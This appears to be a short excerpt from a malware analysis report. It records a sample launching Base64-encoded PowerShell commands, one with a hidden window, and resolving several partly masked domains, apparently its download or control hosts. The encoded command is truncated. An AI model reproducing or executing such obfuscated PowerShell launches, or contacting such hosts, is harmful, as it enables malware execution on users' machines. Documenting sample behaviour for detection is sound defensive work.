Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncoD PAAjACAARQB4AHUAbwBkAGkAdABiACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvAFYAYQB6AGEAawBuAGMAcABzAHEAbAAgACMAPgAgACQAQQBtAHQAdgBwAHcAZgBmAHQAeAA9ACcAVQBjAGsAcw...
- DNS ASK ho####tuyensinh.vn
- DNS ASK m3##obal.io
- DNS ASK he###ico.gob.mx
- DNS ASK de#####orspainters.net
- DNS ASK ne###kavir.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncoD PAAjACAARQB4AHUAbwBkAGkAdABiACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvAFYAYQB6AGEAawBuAGMAcABzAHEAbAAgACMAPgAgACQAQQBtAHQAdgBwAHcAZgBmAHQAeAA9ACcAVQBjAGsAcw...' (with hidden window)